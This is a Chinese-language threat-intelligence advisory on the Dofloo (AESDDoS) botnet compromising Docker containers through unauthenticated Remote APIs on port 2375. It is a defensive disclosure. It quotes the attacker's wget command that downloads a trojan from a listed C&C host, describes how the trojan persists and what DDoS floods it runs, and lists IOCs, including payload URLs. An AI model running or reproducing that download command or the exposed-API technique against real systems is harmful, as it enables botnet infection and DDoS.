感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/ceNfVRneGGIkbFOqItU11g  一、概述

腾讯安全威胁情报中心检测到Dofloo（AESDDoS）僵尸 *** 正批量扫描和攻击Docker容器。部分云主机上部署的Docker容器没有针对远程访问做安全认证，存在Remote API允许未授权使用漏洞且暴露在公网，导致黑客通过漏洞入侵并植入Dofloo僵尸 *** 木马。

云计算兴起后，服务器硬件扩展非常便利，软件服务部署成为了瓶颈，Docker作为开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器，因而逐渐得到广泛应用。

而开发者在部署Docker时未对相关服务进行正确合理的配置导致其容易成为黑客入侵的路径之一，之前已有H2Miner利用Docker漏洞进行入侵挖矿的案例被披露（https://mp.weixin.qq.com/s/iNq8SdTZ9IrttAoQYLJw5A）。此次Dofloo僵尸 *** 入侵系统后，会搜集系统敏感信息并加密上传，接收C&C服务器指令，执行各类DDoS攻击。

腾讯安全系列产品已支持检测Dofloo（AESDDoS）僵尸 *** 的最新变种，企业安全运维人员如果发现已经中招，可对照分析报告的详细内容，将攻击者下载安装的文件和启动项删除，再参考以下安全响应清单进行排查，修复Remote API允许未授权使用的漏洞，避免再次遭遇入侵。

具体响应清单如下：

应用
场景 安全产品 解决方案 威

胁

情

报

腾讯T-Sec

威胁情报云查服务

（SaaS）

1）Dofloo僵尸 *** 相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1）Dofloo僵尸 *** 相关信息和情报已支持检索。

网管可通过威胁追溯系统，分析日志，进行线索研判、追溯 *** 入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts

云原生安全

防护

云防火墙

（Cloud Firewall，CFW）

基于 *** 流量进行威胁检测与主动拦截，已支持：

1）Dofloo僵尸 *** 关联的IOCs已支持识别检测；

2）检测Docker未授权访问漏洞利用攻击。

有关云防火墙的更多信息，可参考：
https://cloud.tencent.com/product/cfw

腾讯T-Sec  主机安全

（Cloud Workload Protection，CWP）

1）已支持查杀Dofloo僵尸 *** 相关木马程序；

2）已支持Docker Daemon 2375管理端口开启的风险项检测。

腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp

腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html

非云企业安全防护 腾讯T-Sec

高级威胁检测系统

（腾讯御界）

1）已支持通过协议检测Dofloo僵尸 *** 与服务器的 *** 通信；

2）检测Docker未授权访问漏洞利用攻击；

3）检测DDoS攻击流量；

关于T-Sec高级威胁检测系统的更多信息，可参考：

https://cloud.tencent.com/product/nta

二、样本分析

在此次攻击中，攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCP SYN数据包对给定的IP范围进行批量扫描。确定开放端口的目标IP后，发送请求调用/containers/json接口获取正在运行中的容器列表，之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7。

获取容器列表：

针对运行状态的容器利用Docker EXEC执行木马下载命令： wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7

被下载的Dofloo僵尸 *** 木马Linux2.7会连接到49.235.238.111:48080来发送和接收来自攻击者的远程shell命令。 Dofloo僵尸 *** 还会在从被感染系统窃取信息，包括操作系统版本，CPU型号、速度和类型。 通过将自身路径写入/etc/rc.local、/etc/rc.d/rc.local、/etc/init.d/boot.local文件中以添加为自启动项。
使用AES算法对窃取的系统信息和命令和控制（C＆C）数据进行加密。 此Dofloo变种能够发起各种类型的DDoS攻击，包括DNS、SYN，LSYN，UDP，UDPS，TCP和CC Flood。

IOCs

C&C
49.235.238.111:48080
175.24.123.205: 48080

IP
49.235.238.111
89.40.73.126
175.24.123.205

URL
http[:]//49.235.238.111[:]88/Linux2.7
http[:]//49.235.238.111/Lov.sh
http[:]//49.235.238.111/lix
http[:]//49.235.238.111/Verto
http[:]//49.235.238.111[:]88/NgYx
http[:]//49.235.238.111/linux-arm
http[:]//49.235.238.111/shre.sh
http[:]//89.40.73.126[:]8080/Linux2.7
http[:]//89.40.73.126/linux2.6
http[:]//89.40.73.126[:]8080/linux-arm
http[:]//89.40.73.126[:]8080/Linux2.6
http[:]//89.40.73.126[:]8080/YmY
http[:]//89.40.73.126[:]8080/LTF
http[:]//89.40.73.126[:]8080/NgYx
http[:]//89.40.73.126[:]8080/Mar
http[:]//89.40.73.126[:]8080/linux2.6
http[:]//89.40.73.126[:]8080/Flood
http[:]//175.24.123.205:88/Fck

MD5

Flood 0579a022802759f98bfdf08e7dd16768 Linux2.7 0b0f1684f6791d9f8c44a036aa85a2cc lix 9530e46caab834e1e66a108e15ea97ca linux-arm ca1f347447ddf7990ccd0d6744f3545d Linux 05f28784a0da0c1e406d98c02dc7d560 arm 34eeb9eaa65c4a062311a886dd0157f1 Fck df86da9e341c3a9822f30ac4eba11951 Lov.sh 83caa873cee081162c417eb8dec4a351 Rze.sh 48c910cd9a07404fbfb8bf52847e72c3 SHre.sh bb7cdf5707a857036cd41af4bafaed31

参考链接：

https://www.trendmicro.com/en_us/research/19/f/aesddos-botnet-malware-infiltrates-containers-via-exposed-docker-apis.html
https://github.com/SPuerBRead/Docker-Remote-API-Exploit/blob/master/dockerAPI_Exploit.py